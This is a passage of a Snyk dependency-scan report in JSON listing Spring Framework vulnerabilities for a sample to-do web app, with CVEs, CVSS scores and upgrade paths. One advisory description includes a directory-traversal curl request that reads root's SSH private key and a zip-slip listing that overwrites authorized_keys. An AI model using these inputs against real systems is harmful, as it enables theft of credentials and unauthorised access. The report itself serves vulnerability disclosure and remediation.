true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", - "title": "Open Redirect", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "credit": [ - "L0ne1y" - ], - "semver": { - "vulnerable": [ - "[,5.3.34)", - "[6.0.0, 6.0.19)", - "[6.1.0, 6.1.6)" - ] - 
}, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.34", - "6.0.19", - "6.1.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.4, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://spring.io/security/cve-2024-22262", - "title": "Spring Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-04-16T13:32:25.163950Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.4, - "cvssVersion": "3.1", - "modificationTime": "2024-04-12T08:32:41.960388Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-04-16T13:32:25.163950Z" - } - ], - "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` is used to parse an externally provided URL and perform validation checks on the host of the parsed URL. 
\n\n**Note:**\nThis is the same as [CVE-2024-22259](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790) and [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.34, 6.0.19, 6.1.6 or higher.\n## References\n- [Spring Advisory](https://spring.io/security/cve-2024-22262)\n", - "epssDetails": { - "percentile": "0.09306", - "probability": "0.00043", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-22262" - ], - "CWE": [ - "CWE-601" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2024-04-12T08:32:41.735891Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-04-11T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2024-04-12T08:32:41.913608Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-04-16T13:32:25.163950Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.3.34" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", - "title": "Improper Output Neutralization for Logs", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Dennis Kennedy" - ], - "semver": { - "vulnerable": [ - "[5.3.0,5.3.12)", - "[,5.2.18)" - ] - }, - "exploit": "Not 
Defined", - "fixedIn": [ - "5.3.12", - "5.2.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", - "title": "Github Commit" - }, - { - "url": "https://pivotal.io/security/cve-2021-22096", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:20.847607Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to 
Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", - "epssDetails": { - "percentile": "0.34533", - "probability": "0.00079", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22096" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-02T11:14:46.053186Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-10-27T12:52:59Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2021-10-27T16:55:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.086414Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.2.18.RELEASE", - "org.springframework:spring-core@5.2.18.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "psytester" 
- ], - "semver": { - "vulnerable": [ - "[,5.2.19.RELEASE)", - "[5.3.0,5.3.14)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.19.RELEASE", - "5.3.14" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://pivotal.io/security/cve-2021-22060", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:24.703024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user 
provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", - "epssDetails": { - "percentile": "0.23203", - "probability": "0.00054", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22060" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-06T12:31:26.181234Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-01-06T11:18:34Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2022-01-06T17:17:24.995166Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:10.667113Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.2.19.RELEASE", - "org.springframework:spring-core@5.2.19.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", - "title": "Directory Traversal", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ 
- "3.2.9.RELEASE", - "4.0.5.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "filePath": "org/springframework/util/StringUtils.java", - "className": "StringUtils", - "functionName": "cleanPath" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/16414", - "title": "GitHub Issue" - }, - { - "url": "https://jira.spring.io/browse/SPR-12354", - "title": "Jira Issue" - }, - { - "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", - "title": "JVNDB" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", - "title": "NVD" - }, - { - "url": "https://pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "http://www.pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": 
"2024-03-06T13:56:25.325641Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. 
\n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", - "epssDetails": { - "percentile": "0.69801", - "probability": "0.00301", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-3578" - ], - "CWE": [ - "CWE-22" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:31.465000Z", - 
"functions_new": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "className": "org.springframework.util.StringUtils", - "functionName": "cleanPath" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2014-09-05T17:16:58Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2014-09-05T17:16:58Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:07.314890Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@3.2.9.RELEASE", - "org.springframework:spring-core@3.2.9.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "4ra1n" - ], - "semver": { - "vulnerable": [ - "[,5.2.20.RELEASE)", - "[5.3.0,5.3.17)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.20.RELEASE", - "5.3.17" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": 
"https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28145", - "title": "GitHub Issue" - }, - { - "url": "https://pivotal.io/security/cve-2022-22950", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:47.044801Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:01.573408Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.044801Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", - "epssDetails": { - "percentile": "0.35300", - "probability": "0.00081", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22950" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2022-03-29T10:05:31.971026Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-03-29T09:51:43Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not 
Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2022-03-29T14:24:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.044801Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.0.0.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Google OSS-Fuzz team" - ], - "semver": { - "vulnerable": [ - "[,5.2.23.RELEASE)", - "[5.3.0,5.3.26)", - "[6.0.0,6.0.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.23.RELEASE", - "5.3.26", - "6.0.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20861", - 
"title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:22.626014Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", - "epssDetails": { - "percentile": "0.48906", - "probability": 
"0.00133", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20861" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-03-23T12:26:39.837900Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-03-23T11:49:46Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2023-03-23T12:37:13.052190Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.291695Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@5.0.0.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Google OSS-Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,5.2.24.RELEASE)", - "[5.3.0,5.3.27)", - "[6.0.0,6.0.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.24.RELEASE", - "5.3.27", - "6.0.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": 
